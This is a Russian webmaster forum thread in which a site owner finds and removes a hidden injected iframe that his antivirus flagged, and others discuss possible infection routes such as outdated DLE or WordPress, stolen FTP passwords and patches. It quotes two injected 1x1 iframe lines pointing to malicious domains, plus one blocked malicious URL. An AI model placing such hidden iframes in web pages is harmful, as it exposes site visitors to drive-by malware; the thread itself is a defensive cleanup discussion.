Возможно взломали сайт

12
[Удален]
1800

Здравствуйте. Заметил странность, что мой KIS 2013 (лицензия) при заходе на сайт ругается. Вот что пишет:

infogob.php?i=25141 Запрещено: http://newhoststatsb.dyndns.info/infogob.php?i=25141 (проверка по базе вредоносных веб-адресов) 24.07.2013 12:13:37 http://newhoststatsb.dyndns.info/

Судя по поиску (вводил: infogob.php?i) - это явно заражение. Пока тьфу-тьфу ни Гугл ни Яндекс не пишут что сайт "может угрожать безопасности", но уверен, что это скоро произойдет.

Собственно - подскажите, может кто уже встречался с этой напастью и как ее вылечить, что проверять в первую очередь?

---------- Добавлено 24.07.2013 в 12:37 ----------

Собственно еще немного покопав поиск - понял, что дело в iframe - открыл исходный код главной страницы и поиском нашел, что в самом конце, после закрывающего тега <html> был вставлен код:

<iframe src="http://3dxtras.ru.tf/" width="1" height="1" align="left"></iframe>

Его убрал, KIS перестал ругаться.

Собственно остался только вопрос - через какую "дырку" его туда засунули?

Stanok
На сайте с 26.04.2010
Offline
89
#1

Посмотрите код, нет ли лишних внешних ссылок, до или после тэгов html

Если не найдете, покажите в личку сайт.

Но вообще вирусняка на сайте сразу видно, скрипты или iframe, которых быть не должно, появляются в коде.

R
На сайте с 24.01.2008
Offline
180
#2

ТС вариантов попадания вредоносных кодов много, без анализа на вскидку говорить бессмысленно.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
K5
На сайте с 21.07.2010
Offline
209
#3

движок дле?

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
servercraft
На сайте с 03.07.2013
Offline
8
#4
Dizels:

Собственно остался только вопрос - через какую "дырку" его туда засунули?

чтобы предполагать - нужно как минимум озвучить название движка сайта, его версию и тд

как минимум могли просто спереть сохраненный пароль от фтп.

может быть что угодно...

http://serverсraft.com.ua (http://servercraft.com.ua) настраиваем сервера, удаляем вирусы с сайтов
ussuriyskiy
На сайте с 05.07.2011
Offline
92
#5

Такая же фигня сегодня произошла на двух сайтах ДЛЕ 9.2 и 9.6 - убрал iframe в main.tpl после </html>, поменял все пасы, написал хостеру... Ребята посоветовали проверить комп на вирусы. Проверил, удалил 8 штук - они были причиной или нет, не знаю. Пока вроде все ок...

PS. втюхали вот этот код

<iframe src="http://womin.ru.tf/" width="1" height="1" align="left"></iframe>
>>> Вечные ссылки на Вечных СМИ (http://goo.gl/gJW21P)
K5
На сайте с 21.07.2010
Offline
209
#6

ussuriyskiy, пачти установлены?

ussuriyskiy
На сайте с 05.07.2011
Offline
92
#7
kgtu5:
ussuriyskiy, пачти установлены?

Да. На этом аккаунте еще один сайт стоит, он без патчей, двиг 9.7 - но с ним все ок

[Удален]
#8

Собственно после апа сайту Яндекс присвоил "может быть опасен..." После нажатия на кнопку перепроверки (на тот момент уже удалил iframe) пришло сообщение (в Вебмастере):

Последняя проверка сайта 27 Июля 2013 не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.

Я уже обрадовался, но сегодня пришло еще 2 сообщения - первое что на сайте опять обнаружен вредоносный код, а второе о перепроверке (хотя вроде я ее больше не заказывал):

Cайт был перепроверен 28 Июля 2013. К сожалению, на сайте остались страницы, содержащие вредоносный код.

Собственно пересмотрел всю страницу - никаких iframe там нет. Касперский тоже молчит.

Может ли это быть "глюком" Яндекса (я про повторное определение заражения) или оно имеет место быть?

Движок - WP 3.5.2

TF-Studio
На сайте с 17.08.2010
Offline
334
#9

Сайт в личку можно?

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
R
На сайте с 24.01.2008
Offline
180
#10
Dizels:


Собственно пересмотрел всю страницу - никаких iframe там нет. Касперский тоже молчит.
Может ли это быть "глюком" Яндекса (я про повторное определение заражения) или оно имеет место быть?

Движок - WP 3.5.2

Почти во всех случаях, если яндекс помечал сайт как зараженный потом убирал метку, а потом снова ставил, вирус скорей всего есть.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий